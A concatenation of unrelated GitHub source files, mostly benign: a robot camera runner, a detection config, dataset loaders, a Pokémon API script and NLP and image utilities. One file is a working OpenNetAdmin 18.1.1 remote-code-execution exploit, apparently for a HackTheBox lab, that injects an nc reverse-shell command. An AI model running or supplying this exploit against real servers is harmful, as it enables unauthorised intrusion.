Cradle Shutdown\")\n shutdownDialog.setStandardButtons(QMessageBox.Ok)\n shutdownDialog.setDefaultButton(QMessageBox.Ok)\n\n if 
self.setupStep > 2:\n shutdownDialog.setInformativeText(\"Turn Off Motors\\n\")\n shutdownDialog.exec_()\n\n if self.setupStep > 0:\n shutdownDialog.setInformativeText(\"Turn Off Rasberry Pi\\n\")\n shutdownDialog.exec_()\n\n def checkCameras(self):\n # load the cameras\n front_camera = cv2.VideoCapture(FRONT_CAMERA)\n back_camera = cv2.VideoCapture(BACK_CAMERA)\n\n # test cameras and warn user if one is missing\n retFont, frame = front_camera.read()\n retBack, frame = back_camera.read()\n\n # release the cameras\n if front_camera:\n front_camera.release()\n if back_camera:\n back_camera.release()\n\n msg = \"\"\n result = True\n if not retFont:\n msg = \"The front camera is not connected. The application will not be launched.\"\n result = False\n elif not retBack:\n msg = \"The back camera is not connected. The application will be launched without the back camera.\"\n\n if msg is not \"\":\n cameraDialog = QMessageBox()\n cameraDialog.setText(\"ERROR\")\n cameraDialog.setStandardButtons(QMessageBox.Ok)\n cameraDialog.setDefaultButton(QMessageBox.Ok)\n\n cameraDialog.setInformativeText(msg)\n cameraDialog.exec_()\n\n return result\n\n\nclass RunCatsCradle(object):\n def __init__(self, returnToZero=True, app=None):\n self.app = app\n self.returnToZero = returnToZero\n self.running = False\n\n def run(self):\n self.running = True\n\n logging.basicConfig(filename='interactions.log', level=logging.INFO)\n # comment this line to enable logging\n logging.disable(logging.INFO)\n logging.info(str(time.time()) + ' started.')\n\n cameraMaxX = 1920\n cameraMaxY = 1080\n\n actionModule = ActionModule(cameraMaxX, cameraMaxY, dummy=\"--dummyAction\" in sys.argv)\n\n print('Loaded Action Module...\\n')\n\n response_module = ResponseModule(actionModule)\n\n print('Loaded Response Module...\\n')\n\n emotion_module = EmotionModule(response_module, visualise=True)\n\n print('Loaded Emotion Module...\\n')\n\n sensor_module = SensorModule(emotion_module)\n sensor_module.loadReactors()\n\n print('Loaded Sensor Module...\\n')\n\n # loading the camera should happen after sensor module is initialized but before loading camera for the sensor module\n front_camera = cv2.VideoCapture(FRONT_CAMERA)\n front_camera.set(cv2.CAP_PROP_FRAME_WIDTH, cameraMaxX)\n front_camera.set(cv2.CAP_PROP_FRAME_HEIGHT, cameraMaxY)\n\n back_camera = cv2.VideoCapture(BACK_CAMERA)\n back_camera.set(cv2.CAP_PROP_FRAME_WIDTH, cameraMaxX)\n back_camera.set(cv2.CAP_PROP_FRAME_HEIGHT, cameraMaxY)\n sensor_module.loadSensors(front_camera, back_camera)\n\n while self.running:\n\n sensor_module.update()\n\n if self.app is not None:\n # Process the app events to catch a click on Shutdown button\n self.app.processEvents()\n else:\n # Hit 'q' on the keyboard to quit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n self.running = False\n\n\n print(\"stopping...\")\n sensor_module.cleanup()\n if front_camera:\n front_camera.release()\n if back_camera:\n back_camera.release()\n cv2.destroyAllWindows()\n\n # Clear the current queue\n actionModule.clearQueue()\n\n if self.returnToZero:\n # Go to resting pose\n actionModule.goBackToZero()\n\n actionModule.stop()\n logging.info(str(time.time()) + ' ended.')\n\n def stop(self):\n self.running = False\n\n\nif __name__ == \"__main__\":\n noSetup = False\n noShutdown = False\n returnToZero = True\n if \"--noUI\" in sys.argv:\n noSetup = True\n noShutdown = True\n returnToZero = False\n\n app = QApplication(sys.argv)\n\n run = RunCatsCradle(returnToZero, app)\n appWidget = AppRun(run)\n\n launch = True\n if not 
noSetup:\n launch = appWidget.setup()\n\n if launch and not \"--noCameraCheck\" in sys.argv:\n launch = appWidget.checkCameras()\n\n if \"--dummyAction\" in sys.argv:\n launch = True\n\n if launch:\n appWidget.show()\n app.processEvents()\n run.run()\n\n if not noShutdown:\n appWidget.shutdown()\n","repo_name":"Kazjon/CatsCradle","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"13013582228","text":"_base_ = [\n '../_base_/datasets/underwater_detection.py',\n '../_base_/default_runtime.py', '../_base_/schedules/schedule_1x.py'\n]\n# model settings\nmodel = dict(\n type='FCOS',\n pretrained='open-mmlab://detectron/resnet50_caffe',\n backbone=dict(\n type='ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n norm_cfg=dict(type='BN', requires_grad=False),\n norm_eval=True,\n style='caffe'),\n neck=dict(\n type='FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n start_level=1,\n add_extra_convs=True,\n extra_convs_on_inputs=False, # use P5\n num_outs=5,\n relu_before_extra_convs=True),\n bbox_head=dict(\n type='FCOSHead',\n num_classes=4,\n in_channels=256,\n stacked_convs=4,\n feat_channels=256,\n strides=[8, 16, 32, 64, 128],\n loss_cls=dict(\n type='FocalLoss',\n use_sigmoid=True,\n gamma=2.0,\n alpha=0.25,\n loss_weight=1.0),\n loss_bbox=dict(type='IoULoss', loss_weight=1.0),\n loss_centerness=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0)),\n # training and testing settings\n train_cfg=dict(\n assigner=dict(\n type='MaxIoUAssigner',\n pos_iou_thr=0.5,\n neg_iou_thr=0.4,\n min_pos_iou=0,\n ignore_iof_thr=-1),\n allowed_border=-1,\n pos_weight=-1,\n debug=False),\n test_cfg=dict(\n nms_pre=1000,\n min_bbox_size=0,\n score_thr=0.05,\n nms=dict(type='nms', iou_threshold=0.5),\n max_per_img=100))\n\n\"\"\"\noptimizer = dict(type='SGD', lr=0.00125, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=None)\n# learning policy\n# actual epoch = 3 * 3 = 9\n#lr_config = dict(policy='step', step=[3])\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=0.001,\n step=[8, 11])\n# runtime settings\n# total_epochs = 10 # actual epoch = 4 * 3 = 12\n# runtime settings\nrunner = dict(\n type='EpochBasedRunner', max_epochs=12) # actual epoch = 4 * 3 = 12\n\"\"\"\noptimizer = dict(type='SGD', lr=0.00125, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=None)\n# learning policy\n# actual epoch = 3 * 3 = 9\nlr_config = dict(policy='step', step=[3])\n# runtime settings\n# total_epochs = 10 # actual epoch = 4 * 3 = 12\n# runtime settings\nrunner = dict(\n type='EpochBasedRunner', max_epochs=10) # actual epoch = 4 * 3 = 12\n\n","repo_name":"iPriest001/my_mmdetection","sub_path":"configs/fcos/fcos_r50_underwater_caffe_fpn_gn-head_1x.py","file_name":"fcos_r50_underwater_caffe_fpn_gn-head_1x.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31033504946","text":"import textwrap\n\ndef src(proj_name, ver, desc, git_url, author, author_email, license_name):\n\n return textwrap.dedent(\n'''\n{{\n \"name\": \"{PROJECT_NAME}\",\n \"version\": \"{VERSION}\",\n \"description\": \"{DESCRIPTION}\",\n \"repository\": \"{GIT_REPOSITORY}\",\n \"author\": \"{AUTHOR_NAME} <{EMAIL}>\",\n \"license\": \"{LICENSE}\",\n \"private\": true,\n 
\"dependencies\": {{\n \"@angular/animations\": \"^5.2.0\",\n \"@angular/common\": \"^5.2.0\",\n \"@angular/compiler\": \"^5.2.0\",\n \"@angular/core\": \"^5.2.0\",\n \"@angular/forms\": \"^5.2.0\",\n \"@angular/http\": \"^5.2.0\",\n \"@angular/platform-browser\": \"^5.2.0\",\n \"@angular/platform-browser-dynamic\": \"^5.2.0\",\n \"@angular/router\": \"^5.2.0\",\n \"core-js\": \"^2.4.1\",\n \"rxjs\": \"^5.5.6\",\n \"zone.js\": \"^0.8.19\"\n }},\n \"scripts\": {{\n \"ng\": \"ng\",\n \"start\": \"ng serve\",\n \"build\": \"ng build --prod\",\n \"test\": \"ng test\",\n \"lint\": \"ng lint\",\n \"e2e\": \"ng e2e\"\n }},\n \"devDependencies\": {{\n \"@angular/cli\": \"1.6.8\",\n \"@angular/compiler-cli\": \"^5.2.0\",\n \"@angular/language-service\": \"^5.2.0\",\n \"@types/jasmine\": \"~2.8.3\",\n \"@types/jasminewd2\": \"~2.0.2\",\n \"@types/node\": \"~6.0.60\",\n \"codelyzer\": \"^4.0.1\",\n \"jasmine-core\": \"~2.8.0\",\n \"jasmine-spec-reporter\": \"~4.2.1\",\n \"karma\": \"~2.0.0\",\n \"karma-chrome-launcher\": \"~2.2.0\",\n \"karma-coverage-istanbul-reporter\": \"^1.2.1\",\n \"karma-jasmine\": \"~1.1.0\",\n \"karma-jasmine-html-reporter\": \"^0.2.2\",\n \"protractor\": \"~5.1.2\",\n \"ts-node\": \"~4.1.0\",\n \"tslint\": \"~5.9.1\",\n \"typescript\": \"~2.5.3\"\n }}\n}}\n''').format(\n PROJECT_NAME = proj_name,\n VERSION = ver,\n DESCRIPTION = desc,\n GIT_REPOSITORY = git_url,\n AUTHOR_NAME = author,\n EMAIL = author_email,\n LICENSE = license_name\n ).strip()\n","repo_name":"shotastage/mirage-django","sub_path":"console/template/package_json_angular.py","file_name":"package_json_angular.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"38609790332","text":"import os\nimport os.path as osp\nimport shutil\nfrom glob import glob\n\nfrom tqdm import tqdm\n\nimport torch\nfrom torch_geometric.data import Dataset, Data, InMemoryDataset\nimport numpy as np\nimport math\n\nclass ModelNetSdfSphereRotate(InMemoryDataset):\n def __init__(self, root, transform = None, pre_transform = None):\n self.root = root\n self.read_func = self.read_graph\n\n super(ModelNetSdfSphereRotate, self).__init__(root, transform, pre_transform)\n\n self.train_dataset = torch.load(self.processed_paths[0])\n self.test_dataset = torch.load(self.processed_paths[1])\n\n \n\n def process(self):\n files = []\n datas = []\n self.label_name = []\n graph_type = 0\n folders = [f.path for f in os.scandir(self.root) if f.is_dir()]\n for folder in folders:\n folder_name = folder.split(\"/\")[-1]\n if(folder_name == \"processed\"):\n continue\n self.label_name.append(folder_name)\n files = glob(osp.join(folder, \"train\", \"*.txt\"))\n for file in tqdm(files):\n data = self.read_func(file, graph_type)\n datas.append(data)\n graph_type += 1\n self.train_dataset = datas\n\n datas2 = []\n graph_type2 = 0\n for folder in folders:\n folder_name = folder.split(\"/\")[-1]\n if(folder_name == \"processed\"):\n continue\n files = glob(osp.join(folder, \"test\", \"*.txt\"))\n for file in tqdm(files):\n data = self.read_func(file, graph_type2)\n datas2.append(data)\n graph_type2 += 1\n self.test_dataset = datas2\n\n torch.save(self.train_dataset, self.processed_paths[0])\n torch.save(self.test_dataset, self.processed_paths[1])\n\n\n @property\n def raw_file_names(self):\n return []\n\n @property\n def processed_file_names(self):\n return ['train_rotate.pt', 'test_rotate.pt']\n\n\n\n def read_graph(self, path, graph_type):\n f = open(path)\n x 
= []\n y = torch.tensor([graph_type], dtype=torch.long)\n edge_index = [[], []]\n edge_attr = []\n nodeNum = (int)(f.readline())\n for i in range(nodeNum):\n line = f.readline()\n x.append([float(x) for x in line.split()])\n \n \n\n linkNum = (int)(f.readline())\n links = []\n for i in range(linkNum):\n line = f.readline()\n _x, _y, _len = line.split()\n links.append([_x, _y, _len])\n edge_index[0].append((int)(_x))\n edge_index[1].append((int)(_y))\n edge_index[0].append((int)(_y))\n edge_index[1].append((int)(_x))\n edge_attr.append([float(_len)])\n edge_attr.append([float(_len)])\n \n x = np.array(x)\n x[np.isnan(x)] = 0\n xM = x.max(axis=0)\n xm = x.min(axis=0)\n x_m = np.where(-xm>xM, -xm, xM)\n x_m[x_m == 0] = 1\n x_m[0] = 1\n x_m[1] = 1\n x /= x_m\n\n x = torch.tensor(x, dtype = torch.float)\n edge_index = torch.tensor(edge_index, dtype = torch.long)\n edge_attr = torch.tensor(edge_attr, dtype = torch.float)\n data = Data(x = x, edge_index = edge_index, edge_attr = edge_attr, y = y)\n return data","repo_name":"cscvlab/SN-Graph","sub_path":"SN-Graph Network/ModelNet40sdfsphRotate.py","file_name":"ModelNet40sdfsphRotate.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"94"} +{"seq_id":"37070295397","text":"import poke_validation as pv\nfrom get_module import get_info\nfrom poke_comentarios import obtener_comentarios\nfrom poke_span import genera_span\nfrom string import Template\nfrom show import show_pics\n\n\nname = input('Ingrese el nombre del pokemon a buscar\\n(Nota: Si el pokémon tiene espacios reemplace por \"-\".\\nNo '\n 'coloque ningún tipo de signo de puntuación adicional. \\nEjemplo: Mr. Mime, se debe ingresar como '\n 'mr-mime o Mr-Mime): ')\nname = pv.validate(name)\nurl_base = f'https://pokeapi.co/api/v2/pokemon/{name}'\ndata_base = get_info(url_base)\nname = name.capitalize()\npoke_n = data_base[\"id\"]\nstats = data_base[\"stats\"]\n\nindicadores = []\nfor item in stats:\n indicadores.append(item[\"base_stat\"])\n\n\npoke_hp, poke_at, poke_de, poke_ate, poke_dee, poke_ve = indicadores\n\n# imagen (url)\npoke_img = data_base['sprites']['front_default']\n\n# etapa previa\nurl_previa = f\"https://pokeapi.co/api/v2/pokemon-species/{poke_n}\"\ndata_etapa_previa = get_info(url_previa)\n\npoke_etapa_previa = data_etapa_previa['evolves_from_species']\nif poke_etapa_previa is not None:\n poke_etapa_previa = poke_etapa_previa['name'].capitalize()\nelse:\n poke_etapa_previa = \"\"\nif poke_etapa_previa != \"\":\n poke_etapa_previa = f\"Etapa Previa: {poke_etapa_previa}\"\n\n# tipos\ntipos_lista = data_base[\"types\"]\n\ntipos = []\nfor item in tipos_lista:\n tipos.append(item[\"type\"][\"name\"])\n\n\n# descripción\npoke_comentario = obtener_comentarios(poke_n)\n\n# span tipos\nspan_tipo = f\"{genera_span(tipos)}\"\n\n# fortalezas y debilidades\nurl_damage = [item[\"type\"][\"url\"] for item in tipos_lista]\n\n# indicadores de combate\nurl_damage = []\nfor item in tipos_lista:\n url_damage.append(item[\"type\"][\"url\"])\n\nif len(url_damage) == 1:\n data_rel1 = get_info(url_damage[0])\n\nelse:\n data_rel1 = get_info(url_damage[0])\n data_rel2 = get_info(url_damage[1])\n\n# super eficaz contra\nif len(url_damage) == 1:\n supef_contra = data_rel1[\"damage_relations\"][\"double_damage_to\"]\nelse:\n supef_contra = data_rel1[\"damage_relations\"][\"double_damage_to\"] + data_rel2[\"damage_relations\"][\"double_damage_to\"]\n\n\nsupef_co = [item[\"name\"] for item in supef_contra]\nsupef_co = 
set(supef_co)\n\n\n# debil contra\nif len(url_damage) == 1:\n debil_contra = data_rel1[\"damage_relations\"][\"double_damage_to\"]\nelse:\n debil_contra = data_rel1[\"damage_relations\"][\"double_damage_to\"] + data_rel2[\"damage_relations\"][\"double_damage_to\"]\n\ndeb_co = [item[\"name\"] for item in debil_contra]\ndeb_co = set(deb_co)\n\n\n# resistente contra\nif len(url_damage) == 1:\n resistente_contra = data_rel1[\"damage_relations\"][\"half_damage_from\"]\nelse:\n resistente_contra = data_rel1[\"damage_relations\"][\"half_damage_from\"] + data_rel2[\"damage_relations\"][\"half_damage_from\"]\n\nres_co = [item[\"name\"] for item in resistente_contra]\nres_co = set(res_co)\n\n\n# poco eficaz contra\nif len(url_damage) == 1:\n pocoeficaz_contra = data_rel1[\"damage_relations\"][\"half_damage_to\"]\nelse:\n pocoeficaz_contra = data_rel1[\"damage_relations\"][\"half_damage_to\"] + data_rel2[\"damage_relations\"][\"half_damage_to\"]\n\npoef_co = [item[\"name\"] for item in pocoeficaz_contra]\npoef_co = set(poef_co)\n\n\n# inmune contra\nif len(url_damage) == 1:\n inmune_contra = data_rel1[\"damage_relations\"][\"no_damage_from\"]\nelse:\n inmune_contra = data_rel1[\"damage_relations\"][\"no_damage_from\"] + data_rel2[\"damage_relations\"][\"no_damage_from\"]\n\ninm_co = [item[\"name\"] for item in inmune_contra]\ninm_co = set(inm_co)\n\n\n# ineficaz contra\nif len(url_damage) == 1:\n ineficaz_contra = data_rel1[\"damage_relations\"][\"no_damage_to\"]\nelse:\n ineficaz_contra = data_rel1[\"damage_relations\"][\"no_damage_to\"] + data_rel2[\"damage_relations\"][\"no_damage_to\"]\n\ninef_co = [item[\"name\"] for item in ineficaz_contra]\ninef_co = set(inef_co)\n\n\n# span indicadores\nspan_supef_co = genera_span(supef_co)\n\nspan_deb_co = genera_span(deb_co)\n\nspan_res_co = genera_span(res_co)\n\nspan_poef_co = genera_span(poef_co)\n\nspan_inm_co = genera_span(inm_co)\n\nspan_inef_co = genera_span(inef_co)\n\n\n# html de salida\nwith open('index.html', 'r', encoding='utf-8') as infile:\n entrada = infile.read()\n\ndocument_template = Template(entrada)\n\n\n# variables para html\nhtml = document_template.safe_substitute(\n poke_n = poke_n,\n poke_name = name,\n poke_etapa_previa = poke_etapa_previa,\n poke_hp = poke_hp,\n poke_at = poke_at,\n poke_de = poke_de,\n poke_ate = poke_ate,\n poke_dee = poke_dee,\n poke_ve = poke_ve,\n poke_img = poke_img,\n span_tipo = span_tipo,\n poke_comentario = poke_comentario,\n span_supef_co = span_supef_co,\n span_deb_co = span_deb_co,\n span_res_co = span_res_co,\n span_poef_co = span_poef_co,\n span_inm_co = span_inm_co,\n span_inef_co = span_inef_co)\n\n\nshow_pics(html, 'output')\n","repo_name":"RojaVictoria/Prueba-PokeAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41587432033","text":"import logging\nimport requests\nimport os\nimport threading\nimport datetime\n\ndef worker(url=None):\n download_gambar(url)\n print(\"Downloaded {}\\n\" . 
format(url))\n return\n\ndef download_gambar(url=None):\n if (url is None):\n return False\n ff = requests.get(url)\n tipe = dict()\n tipe['image/png']='png'\n tipe['image/jpg']='jpg'\n tipe['image/jpeg']='jpg'\n\n content_type = ff.headers['Content-Type']\n logging.warning(content_type)\n if (content_type in list(tipe.keys())):\n namafile = os.path.basename(url)\n namafile1 = namafile.split('?')\n ekstensi = tipe[content_type]\n logging.warning(f\"writing {namafile}.{ekstensi}\")\n fp = open(namafile1[0]+'.'+ekstensi,\"wb+\")\n fp.write(ff.content)\n fp.close()\n else:\n return False\n\n\n\n\nif __name__=='__main__':\n imgs = [\n 'https://images.unsplash.com/photo-1583142499515-db3e66a57bdc?ixlib=rb-1.2.1&auto=format&fit=crop&w=500&q=60',\n 'https://images.unsplash.com/photo-1520699894975-334692f3a636?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=500&q=60',\n 'https://images.unsplash.com/photo-1453904061941-02ada96e1f4a?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=500&q=60',\n ]\n threads = []\n for im in imgs:\n t = threading.Thread(target=download_gambar,args=(im,))\n threads.append(t)\n t.start()\n\n","repo_name":"rizaldihz/PROGJAR_05111740000024","sub_path":"Tugas3/client_3.py","file_name":"client_3.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11730982292","text":"import string\n# Example using nltk for data retrieval purpose\nimport nltk\nnltk.download('omw-1.4')\nnltk.download('punkt')\nnltk.download('wordnet')\nfrom nltk.stem import WordNetLemmatizer, PorterStemmer\n\ndef wnl(tokenizing_sentence):\n wnl = WordNetLemmatizer()\n new_sentence = []\n i = 0\n while(i\n\nimport argparse\nimport requests\nimport sys\nimport urllib\nfrom pwn import *\n\ndef main():\n global proxies\n \n # args\n argparser = argparse.ArgumentParser(description='OpenNetAdmin 18.1.1 - Remote Code Execution',\n add_help=False)\n main_arg = argparser.add_argument_group(\"MAIN\")\n\n main_arg.add_argument('-h', '--help',\n help='Show this help menu',\n action='store_true')\n\n main_arg.add_argument('--url', type=str,\n help='Remote host to exploit',\n required=True)\n\n main_arg.add_argument('--lhost', type=str,\n help='Local host to receive the reverse shell',\n required=True)\n \n main_arg.add_argument('--lport', type=str,\n help='Local port to receive the reverse shell (default: 4444)',\n default='4444')\n \n main_arg.add_argument('--burpsuite', action='store_true',\n help='Enable BurpSuite\\'s proxy')\n\n args = argparser.parse_args()\n\n # arg validation\n if args.help:\n argparser.print_help()\n sys.exit(1)\n\n # cons\n url = args.url\n lhost = args.lhost\n lport = args.lport\n burpsuite = args.burpsuite\n\n # proxies\n proxies = { \"http\": \"http://127.0.0.1:8080\" }\n\n def reverse_shell(l):\n l.sendline('python3 -c \"import pty;pty.spawn(\\'/bin/bash\\')\"')\n l.interactive()\n\n def exploit():\n global proxies\n\n payload = \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} > /tmp/f\".format(lhost, lport)\n \n params = {\n \"xajax\": \"window_submit\",\n \"xajaxr\": \"1574117726710\",\n \"xajaxargs[]\": [\"tooltips\", 'ip=>;{}'.format(payload), 'ping']\n }\n\n l = listen(lport)\n l1 = log.progress(\"Exploiting the OpenNetAdmin web application\")\n\n if burpsuite:\n try:\n r = requests.post(url, data=params, proxies=proxies, timeout=5)\n except:\n l1.success(\"Success!\")\n log.info(\"Spawning the interactive shell\")\n reverse_shell(l)\n\n 
else:\n try:\n r = requests.post(url, data=params, timeout=5)\n \n except:\n l1.success(\"Success!\")\n log.info(\"Spawning the interactive shell\")\n reverse_shell(l)\n\n # main\n log.info(\"OpenNetadmin 18.1.1 - Remote Code Execution\")\n log.info(\"Python script exploit author: nullarmor\")\n \n exploit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nullarmor/hackthebox-exploits","sub_path":"openadmin/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"94"} +{"seq_id":"14976800848","text":"import json\nimport os\nimport os.path as osp\nfrom functools import lru_cache, wraps\nfrom typing import *\n\nimport h5py\nimport networkx as nx\nimport numpy as np\nimport torch\nfrom rsmlkit.collections.frozendict import frozendict\nfrom rsmlkit.logging import get_logger\n\nlogger = get_logger('__file__')\n\ndef freezeargs(func):\n \"\"\"\n Transform mutable dictionnary\n Into immutable Useful to be compatible with cache\n \"\"\"\n @wraps(func)\n def wrapped(*args, **kwargs):\n args = tuple([frozendict(arg) if isinstance(arg, dict) else arg for arg in args])\n kwargs = {k: frozendict(v) if isinstance(v, dict) else v for k, v in kwargs.items()}\n return func(*args, **kwargs)\n return wrapped\n\n\ndef mkdirs(paths):\n try:\n if isinstance(paths, list):\n for path in paths:\n if not os.path.exists(path):\n os.makedirs(path)\n else:\n if not os.path.exists(paths):\n os.makedirs(paths)\n except FileExistsError as fe:\n logger.error(fe)\n\n@freezeargs\n@lru_cache(maxsize=128)\ndef invert_dict(d):\n return {v: k for k, v in d.items()}\n\n\n@lru_cache(maxsize=16)\ndef load_vocab(path):\n with open(path) as f:\n vocab = json.load(f)\n vocab['question_idx_to_token'] = invert_dict(vocab['question_token_to_idx'])\n vocab['program_idx_to_token'] = invert_dict(vocab['program_token_to_idx'])\n vocab['answer_idx_to_token'] = invert_dict(vocab['answer_token_to_idx'])\n # Sanity check: make sure , , and are consistent\n assert vocab['question_token_to_idx'][''] == 0\n assert vocab['question_token_to_idx'][''] == 1\n assert vocab['question_token_to_idx'][''] == 2\n assert vocab['program_token_to_idx'][''] == 0\n assert vocab['program_token_to_idx'][''] == 1\n assert vocab['program_token_to_idx'][''] == 2\n return vocab\n\n\ndef load_scenes(scenes_json):\n scenes = []\n if scenes_json is None:\n print(\"No scenes_json file specified, returning empty scenes\")\n return scenes\n with open(scenes_json) as f:\n scenes_dict = json.load(f)['scenes']\n for s in scenes_dict:\n table = []\n for i, o in enumerate(s['objects']):\n item = {'id': '%d-%d' % (s['image_index'], i)}\n if '3d_coords' in o:\n item['position'] = [np.dot(o['3d_coords'], s['directions']['right']),\n np.dot(o['3d_coords'], s['directions']['front']),\n o['3d_coords'][2]]\n else:\n item['position'] = o['position']\n item['color'] = o['color']\n item['material'] = o['material']\n item['shape'] = o['shape']\n item['size'] = o['size']\n table.append(item)\n scenes.append(table)\n return scenes\n \n\ndef load_embedding(path):\n return torch.Tensor(np.load(path))\n\ndef load_data_from_h5(question_h5_path):\n question_h5 = h5py.File(question_h5_path, 'r')\n questions = torch.LongTensor(np.asarray(question_h5['questions'], dtype=np.int64))\n image_idxs = np.asarray(question_h5['image_idxs'], dtype=np.int64)\n orig_idxs = np.asarray(question_h5['orig_idxs'], dtype=np.int64)\n programs, answers = None, None\n if 'programs' in 
question_h5:\n programs = torch.LongTensor(np.asarray(question_h5['programs'], dtype=np.int64))\n if 'answers' in question_h5:\n answers = np.asarray(question_h5['answers'], dtype=np.int64)\n if 'question_families' in question_h5:\n question_families = np.asarray(question_h5['question_families'], dtype=np.int64)\n\n return questions, programs, answers, image_idxs, orig_idxs, question_families\n\ndef load_mgn_graph_data(question_h5_path):\n print(f\"Getting graph data from question_h5_path: {question_h5_path}\")\n fdir = osp.dirname(question_h5_path)\n fnp = osp.basename(question_h5_path).split('.')[0]\n print(f\"fnp = {fnp}\")\n load_Gs_fn = lambda x: nx.read_gpickle(f\"{fdir}/{fnp}_{x}.gpickle\")\n graphs = ['Gss', 'Gts', 'Gus', 'Gus_matched']\n loaded_Gs = []\n for gn in graphs:\n loaded_Gs.append(load_Gs_fn(gn))\n print(f\"Number of Graphs loaded = {len(loaded_Gs)}\")\n assert len(loaded_Gs[0]) == len(loaded_Gs[1])\n assert len(loaded_Gs[1]) == len(loaded_Gs[3])\n\n # Load G embeddings ( {fnp}_G_embds.npz )\n embds_fp = f\"{fdir}/{fnp}_G_embds.npz\"\n print(f\"Loading Graph embeddings from: {embds_fp} \")\n G_embds = np.load(embds_fp, allow_pickle=True)\n\n # load_G_embds_fn = lambda x: G_embds[x]\n def load_G_embds_fn(G_embds, x):\n # Convert ndArray to Tensor here\n return G_embds[x]\n\n loaded_embds = []\n for embd in ['Gs_embds', 'Gt_embds', 'Gts_pos']:\n loaded_embds.append(load_G_embds_fn(G_embds, embd))\n\n # Load G edges ( {fnp}_edges.pt )\n edges_fp = f\"{fdir}/{fnp}_edges.pt\"\n print(f\"Loading Graph edges from: {edges_fp} \")\n G_edges = torch.load(edges_fp)\n load_G_edges_fn = lambda x: G_edges[x]\n loaded_edges = []\n for e in ['Ess', 'Ets', 'Eus_matched']:\n loaded_edges.append(load_G_edges_fn(e))\n\n return tuple(loaded_Gs), tuple(loaded_embds), tuple(loaded_edges)\n\n# mgn.reason.run_test\ndef find_clevr_question_type(out_mod):\n \"\"\"Find CLEVR question type according to program modules\"\"\"\n if out_mod == 'count':\n q_type = 'count'\n elif out_mod == 'exist':\n q_type = 'exist'\n elif out_mod in ['equal_integer', 'greater_than', 'less_than']:\n q_type = 'compare_num'\n elif out_mod in ['equal_size', 'equal_color', 'equal_material', 'equal_shape']:\n q_type = 'compare_attr'\n elif out_mod.startswith('query'):\n q_type = 'query'\n return q_type\n\ndef get_prog_from_seq(pseq: List, vocab:dict) -> str:\n i2t = vocab.get('program_idx_to_token')\n t2i = vocab.get('program_token_to_idx')\n if not i2t:\n logger.error(\"Invalid vocab: no program_idx_to_token\")\n return \"N/A\"\n if not t2i:\n logger.error(\"Invalid vocab: no program_idx_to_token\")\n return \"N/A\"\n _start_idx = t2i.get('')\n if not _start_idx:\n _start_idx = 1\n _end_idx = t2i.get('')\n if not _end_idx:\n _end_idx = 2\n pstr = []\n for pi in pseq:\n if pi == _end_idx: break;\n if pi == _start_idx: continue;\n pstr.append(i2t.get(pi))\n pstr = \"->\".join(pstr)\n logger.debug(f\"program seq: {pstr}\")\n return pstr\n\n## Analysis Helper Functions\ndef get_qtype_distribution_from_fp(fp, template=None):\n print(f\"question type distribution in {fp}:\")\n try:\n with open(fp) as f:\n all_questions = json.load(f)['questions']\n get_qtype_distribution_from_questions(all_questions)\n except FileNotFoundError as fne:\n print(fne)\n\ndef get_qtype_distribution_from_h5(fp, vocab_path):\n print(f\"question type distribution in {fp}:\")\n x, y, ans, idx, *_ = load_data_from_h5(fp)\n y = y.numpy()\n vocab = load_vocab(vocab_path)\n all_q_types = []\n c = Counter()\n for pg in y:\n pT = 
vocab['program_idx_to_token'][pg[1]]\n q_type = find_clevr_question_type(pT)\n all_q_types.append(q_type)\n c[q_type] += 1\n\n return c, all_q_types\n\ndef get_qtype_distribution_from_questions(all_questions) -> Tuple[Counter, List]:\n l = len(all_questions)\n # print(\"Num of questions %d\" % l)\n all_programs = list(map(lambda x: x['program'], all_questions))\n all_q_types = []\n c = Counter()\n for pg in all_programs:\n pT = pg[-1]['function']\n q_type = find_clevr_question_type(pT)\n all_q_types.append(q_type)\n c[q_type] += 1\n\n return c, all_q_types\n\n\n","repo_name":"raeidsaqur/mgn","sub_path":"mgn/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7712,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"94"} +{"seq_id":"29737207315","text":"# Use the program developed in Project 03-03 to implement high-boost filtering, \n# as given in Eq. (3.6-9). The averaging part of the process should be done using \n# the mask in Fig. 3.32(a).\n\nfrom PIL import Image, ImageDraw\n\ndef get_origin():\n\n\tfor i in range(width):\n\t\tfor j in range(height):\n\t\t\torigin_image[i][j] = data[i, j]\n\ndef enlarge_image(s, origin_image):\n\n\twidth = len(origin_image)\n\theight = len(origin_image[0])\n\tenlarged_width = 2 * s + width\n\tenlarged_height = 2 * s + height\n\tenlarged_image = [[255 for i in range(enlarged_height)] for 